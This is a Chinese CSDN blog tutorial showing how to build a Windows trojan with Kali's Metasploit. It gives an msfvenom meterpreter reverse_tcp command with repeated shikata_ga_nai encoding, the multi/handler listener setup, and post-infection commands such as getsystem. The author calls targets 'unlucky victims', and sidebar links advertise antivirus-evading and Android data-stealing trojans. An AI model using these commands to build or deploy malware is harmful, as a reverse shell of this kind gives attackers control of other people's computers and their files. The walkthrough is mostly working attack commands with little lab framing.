kali->使用Metaspoit制作木马

最新推荐文章于 2024-03-02 11:00:17 发布
最新推荐文章于 2024-03-02 11:00:17 发布
阅读量1.6w 收藏 76
点赞数 9
分类专栏: Metaspoit 文章标签: 木马 虚拟机 Metaspoit kali2-0
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lonelyhat/article/details/76281367
版权

-**

本人是个新手,写写笔记。 如果那里有错误或者语言不妥的地方。

请给予斧正!万分感谢!

**

写在最前面

网络中的日新月异,时常会有更新,下面是针对msf和kali的更新方式
msf中有许多可用的攻击载荷,如果不及时更新会导致对新系统漏洞的不了解
首先要更新kali:
经典三连

apt-get update
apt-get upgrade & apt-get dist-upgrade   强行三连
apt-get clean

重启一下就可以了 reboot 完成kali的整体更新

其次,单独的对msf框架进行更新

msfupdate

以上就是kali的更新!

下面看完文章,会很好奇这个windows/meterpreter/reverse_tcp 这个是从哪里来的?
这个其实是msf框架中的针对windows的一个攻击载荷
如何查看全部攻击载荷或者筛选出我需要的载荷?

  1. 首先进入msfconsole
  2. show -h 可以帮助你分类查找
    输入 show all 命令就可以查看所有的配置选项在这里插入图片描述
    再往下就是攻击载荷
    可以使用 show payload 命令之查看现在可用的
    你可以找到文章中的windows/meterpreter/reverse_tcp这个payload
    这里面有 windows linux还有安卓的等等,根据需要来使用
    在这里插入图片描述
    在这片文章的后面,也就是先使用msfvemon制作出木马,在进入msfconsole的设置
    如何判断当前的也就是我们选中的攻击载荷是否对目标操作系统具有有效的攻击?
    使用windows/meterpreter/reverse_tcp来举例子
    注意我红框的位置,这里就是目标操作系统的范围在这里插入图片描述
    怎么查看?
    使用 show targets命令查看对那些操作系统有用
    在这里插入图片描述
    这里只有ID 0一个选项,要是有多个选项就是ID 0/ID 1 /ID 2这种格式
    使用 set id 0/1/2 命令来选择需要的操作系统

首先,我们要先知道木马的使用过程,然后我们才能制作出木马

  • 木马:控制端(我们)
  • 被控制端(倒霉蛋们)
  • 虚拟机的kali
  • 打开终端
  • 使用msfvenom -p命令来制作(因为我用的是kali2.0所以和1.0的版本不一样)
  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.1.108 LPORT=5555 -f exe > asd.exe
  • 看不明白?不要慌!
  • windows/meterpreter/reverse_tcp ->大体看出来这是windows下的tcp的一个漏洞(强大的Metaspoit自带多种漏洞,需要什么自行百度就ok)
  • -e x86/shikata_ga_nai ->这是编码方式(我的windows7是64位的,所以要选择对应的编码格式。否则,生成可执行文件再打开时就会出现错误!)
  • -i 5 ->编码次数
  • -b ->就是避免出现的值
  • -f exe ->生成.exe的可执行文件
  • asd.exe > 文件名.exe
  • LHOST ->这是填写自己本机的IP(因为这种木马是用反弹机制)
  • LPORT ->填写自己的端口
  • 回车运行!
  • 这里写图片描述
  • 我们可以看到,它生成一个434b的可执行文件
  • 问题来了!生成的文件在哪里?
  • 使用ls命令查看,生成在当前目录下
  • 然后,将生成文件复制到windows下
  • 第二步
  • 配置接收木马上线的设置
  • 打开Metaspoit
  • 打开的命令为 msfconsole
  • 这里写图片描述
  • 我们就要开始输入命令了
  • msf > use exploit/multi/handler
  • 我们使用handler模块
  • msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  • 打开handler模块后,设置我们制作时用的木马漏洞
  • 这里写图片描述
  • 这里就显示设置成功
  • 我们现在就要设置接收的IP和端口
  • 输入命令
  • msf exploit(handler) > show options
  • 显示,我们需要填写什么设置
  • 这里写图片描述
  • 大家还记得我们制作木马时,填写的ip和端口吧
  • 一定要对应
  • msf exploit(handler) > set LHOST 192.168.1.108
  • 使用set来依次设置
  • msf exploit(handler) > set LPORT 5555
  • 成功设置后
  • 这里写图片描述
  • 最后一步!
  • 输入
  • msf exploit(handler) > exploit
  • 运行,等待木马上线
  • 这里写图片描述
  • 我们在windows下双击运行
  • 这里写图片描述
  • 木马上线成功!
  • 接下来就可以进行系统操作和文件操作
  • background 后台运行
  • sessions -i 查看后台运行会话
  • sessions -i ID号
  • getsystem
梵歆
关注
  • 9
    点赞
  • 76
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用kali-linux-2022.2-vmware-amd64.part1.rar https://download.csdn.net/download/weixin_43800734/85641785 kali-linux-2022.2-vmware-amd64.part2.rar https://download.csdn.net/download/weixin_43800734/85641792 kali-linux-2022.2-vmware-amd64.part3.rar https://download.csdn.net/download/weixin_43800734/85641844 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。预装了许多渗透测试软件,包括nmap 、Wireshark 、Sqlmap等。
kali-linux-2023.3-vmware-amd64.part1.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:https://download.csdn.net/download/weixin_43800734/88423342 文件3:https://download.csdn.net/download/weixin_43800734/88423341 文件4:https://download.csdn.net/download/weixin_43800734/88423331
Kali Linux下利用MSF生成木马入侵同局域网下的电脑(详细版)
最新发布
孟俊宇的博客
03-02 758
本文详细的介绍了在Kali Linux下利用MSF生成木马入侵局域网下电脑的所有命令
Kali木马免杀,权限提升(kali本地木马免杀)
AI学习困难户的博客
02-15 4739
由于现在版本的木马查杀工具更新之快,木马在计算机上基本是裸奔的,再好的免杀技术也逃不过工具的查杀,下面是我研究很久的本地木马免杀,基本都是网上的百度总结,把可以是实现免杀的木马生成进行了总结。 免杀成功1(由于使用的是python载荷,由于权限问题,部分命令不可用) 使用pyinstall,先生成py再转换成exe文件 1.生成py文件 msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.137.44 lport=4444 -f...
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
weixin_44647915的博客
04-18 1万+
目的:制作一个能够绕过火绒检测的简单木马,熟悉一下怎么使用msfvenom制作木马,因此此处使用的火绒版本较低。 工具准备:火绒安全-3.0.42.0 下载文章:火绒历史全版本 百度网盘链接:https://pan.baidu.com/s/1ZrpYG63aDtQDVBnDFZoeXw 提取码:kr72 实验环境:kali-2019.4 (攻击方,IP:192.168.152.134)、win10(靶机) 【知识补充】 关于Msfvenom: (msfvenom ----a Metasploi
kali入门到入狱之 生成木马程序的利用.
网络安全领域___专研者.
03-17 4053
当您忍不住点击一个(美女图片)或(帅哥图片)的时候,或者是您安装一个了来路不明的程序程序时,再或者是您随意点击了一个链接后,可能您的设备已经沦陷了.
kalilinux生成安卓木马(仅供学习使用
热门推荐
qq_51999794的博客
07-27 1万+
kalilinux生成安卓木马——盗取手机数据、控制后台拍照、录像 一、前期准备工作 1.1虚拟机安装好kalilinux 链接:https://pan.baidu.com/s/10rcLYOGYKQb0pETqJLbD4A 提取码:p4dq (本身是想要给你们网站的但是那个包我找不到在哪下载的了,不想要网盘的可以去清华镜像/阿里镜像找找看) 上述是kalilinux的光盘镜像。 1.1.1kalilinux的安装 这个过程有点复杂,我之后再发博客详细讲解下kalilinux的安装。 1.1.2安装之后 打
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 7928
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
使用KALI生成木马病毒实现远程控制
小司机的奥拓
12-25 2219
该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。我将会详细介绍使用Kali Linux系统生成木马并用它远程控制一台处在外网的物理计算机,使用到的工具有:1、VMware Workstation Pro 16(虚拟机)下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html2、Kali Linux 2021(系统)
Kali生成windows木马程序
qq_51950323的博客
09-07 9295
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-27 3490
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕。
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-amd64.part1)
06-14
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-i386.ova)文件分割成 4个 压缩包,必须集齐4个 文件后才能一起解压一起使用kali-linux-2022.2-virtualbox-amd64.part1 ...kali-linux-2022.2-virtualbox-amd...
Kali -> nmap
底层社会中的弱智
08-19 541
主动信息收集 nmap工具 主要主机发现 端口扫描 版本侦测 OS侦测 nmap几个重要的参数 nmap -sn 存活主机 -O 查看操作系统 -sP 在线主机 -sV 端口服务 -A 综合扫描 nmap对于防火墙与IDS的规避 分片 IP诱骗/伪装 指定源端口 扫描延时 其他技术 采用欺骗的方式来进...
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之生成木马
底层社会中的弱智
08-19 391
使用msfvenom生成木马 查看可以支持windows64位的payload msfvenom -l payload | grep x64 msfvenom -p 指定payload -f 输出的格式 -e 是编码器 -c 添加一个win32的shellcode 显示所有payload msfvenm -l payload | more...
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之针对性扫描探测
底层社会中的弱智
08-19 289
针对Mysql版本扫描 use auxiliary/scanner/mysql/mysql_version 实例: msf5 auxiliary(scanner/mysql/mysql_version) > set RHOSTS 10.5.65.100 RHOSTS => 10.5.65.100 msf5 auxiliary(scanner/mysql/mysql_version) ...
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之基本操作
底层社会中的弱智
08-19 217
通过学习msf期间,主要是针对浏览器,操作系统,系统应用之类的漏洞利用,大家要多多留意各大安全平台的最新漏洞提醒,也要学会如何查找对应的漏洞利用。 在我们把postgresql数据库配置完成之后 在kali中输入 msfconsole 进入到工具中 我们查看有哪些攻击载荷 show exploits 如何查看我们所需要的漏洞名 使用 search 漏洞编号 然后就可以...
kali-everything 安装
09-06
要安装kali-everything,可以使用以下解决方案:首先,使用命令"apt-get install kali-tools-top10"来安装kali的前十工具。接下来,使用命令"sudo apt-get install kali-linux-everything"来安装kali的所有软件包。这将确保你安装了kali-linux的每一个组件和工具。你也可以通过下载"kali-linux-2022.3-installer-everything-amd64.iso.torrent"文件,并使用相应的软件来进行安装。另外,你还可以使用命令"sudo apt-get install kali-linux-top10"或"sudo apt-get install kali-linux-all"来安装kali的前十工具或所有软件包。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [解决kali 安装kali-linux-all失败](https://blog.csdn.net/Thea_1207/article/details/122210373)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [kali-linux-2022.3-installer-everything-amd64.iso.torrent](https://download.csdn.net/download/qq_73689812/86537708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值